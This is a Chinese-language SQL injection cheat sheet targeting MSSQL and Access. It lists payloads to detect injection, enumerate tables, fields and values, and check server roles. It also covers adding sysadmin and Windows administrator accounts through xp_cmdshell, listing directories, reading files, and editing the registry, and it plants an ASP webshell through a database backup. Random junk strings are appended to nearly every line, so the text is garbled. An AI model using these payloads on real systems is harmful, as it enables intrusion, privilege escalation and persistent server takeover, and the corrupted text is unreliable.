1.判断是否有注入;and 1=1 ;and 1=2 xH!{;i
2.初步判断是否是mssql ;and user>0 w0(A7L:L
ZNNgi@6>
3.注入参数是字符'and [查询条件] and ''=' U@yn%k9
@U08v_,
4.搜索时没过滤参数的'and [查询条件] and '%25'=' }"BXqh"\`
#9uNJla
5.判断数据库系统 ?(UeWLC#
42kr&UY&
;and (select count(*) from sysobjects)>0 mssql %/NB263Db
:t+XW`eQR:
;and (select count(*) from msysobjects)>0 access MgyV{`
t$m~O?I
8`l bKV
:1NF#-2\f
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Y4q;
~'k.'O{
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 musZCg$
'|V"!R)
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ,\ [R\s
YMx]i,u'+
9.(1)猜字段的ascii值(access) f-&4x_5
VgLrufJ
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 #lXwBfBMf
:23w[vt=
(2)猜字段的ascii值(mssql) ".Z|zt6C
aGY R:jR$
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 IGqg,OEAp
LldZ"%P
10.测试权限结构(mssql) s>hNwb/
*\><MXx
8i"v7}
_dCdyf
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- >qkZn7C
,Axk\7-
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- DtLga[M
VJquB8?H
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- %"kF i
r/o1a't;
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- uL| Wuq
o6L\39v_
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- hq[;QF:B
}n /6.%
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- d^AXhQjQN-
\>,[5|GU
;and 1=(select IS_MEMBER('db_owner'));-- &p|+K
XIf
tP/0_^m
b?S,%
x UM,"+h
11.添加mssql和系统的帐户 otTv,T182
?Vg251-H
;exec master.dbo.sp_addlogin username;-- jNRR=0
;exec master.dbo.sp_password null,username,password;-- RN2^=$'.
Itaq4 ^CE
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Y~vyCU5nWR
W.u+R?a=
;exec master.dbo.xp_cmdshell 'net user username password UqHk2h-
x~3N})T5
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ;\1/4;m
hc#LniR3$
;exec master.dbo.xp_cmdshell 'net user username password /add';-- o3C7JG
REqQJ7a/
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- NPc@;g]d"
ePF)wl;m
#yPQt!
APye
12.(1)遍历目录 !j8.JP}!)
j~DTvWg<Jl
;create table dirs(paths varchar(100), id int) ]k0Pe;<
YO&=fd*
;insert dirs exec master.dbo.xp_dirtree 'c:\' i3
?cL4
n[|*[II
;and (select top 1 paths from dirs)>0 K,B qVu
i{T mn
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 1{%3OG^'
$wnK"k%G
LTsX{z
EL/~c*a/
(2)遍历目录 C=k]g
(x)}k&B;
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- <V?csx/eRd
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 @-B)a Z
al#BfcZW
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 =17d7#-
R9+0ZoS
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 K+WbxovXU
w8(8n&5
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 jg)+]r/hS
3:H[S_q
S=f:-?N|
UYLCzv~W
13.mssql中的存储过程 ,oin<K
,Q%q!#@
xp_regenumvalues 注册表根键, 子键 z?Hi
u6c-
/2s=;tA1
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Hsdcv~Xr;l
kD}w5 U
xp_regread 根键,子键,键值名 ZwzN=03T
u4eA++eT
;exec xp_regread G+5_I"`W
As}3VBd
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ?ZF~U
{e35O(Y
xp_regwrite 根键,子键, 值名, 值类型, 值 \}Hi\k+h':
>_3P6-L>
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 FGRdA^`
P]A~:Lj
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 +Oxw?`I$
5u5-:#sLy
xp_regdeletevalue 根键,子键,值名 =\ek;d0Tqb
ScCp88KpFI
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 6y0CEly>3#
Cf~vT"
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 LdH23\
U))2?#
#B$r|rqamq
s!g06F
14.mssql的backup创建webshell 59R%g .2Y
;:WM^S
use model uge~*S
r*F^8_YMK
create table cmd(str image); xGkc_
6 d;_}
insert into cmd(str) values (''); 4{v?<x8
6?`3zdOeO
backup database model to disk='c:\l.asp'; c*!xdK
6&,{"N0T
, tEd>
~9We)FvU4
15.mssql内置函数 S\poa:D`
f,(@K%
;and (select @@version)>0 获得Windows的版本号 6,raRg6
;5dA
;and user_name()='dbo' 判断当前系统的连接用户是不是sa bxc!x>)
SuJa?VU1w
;and (select user_name())>0 爆当前系统的连接用户 fD* ?JzVY
qx'F9I
;and (select db_name())>0 得到当前连接的数据库 #;(Q \
Z@ dS,M*
hY(q@_s
#qcF2&a%
16.简洁的webshell c,,(s{1
-s_=4U,
use model zcE`.)y
p|`[8uY?
create table cmd(str image); K%@#a}kRb
Ib}~Q@?2
insert into cmd(str) values (''); IM(=j
D:56>%y@
backup database model to disk='g:\wwwtest\l.asp';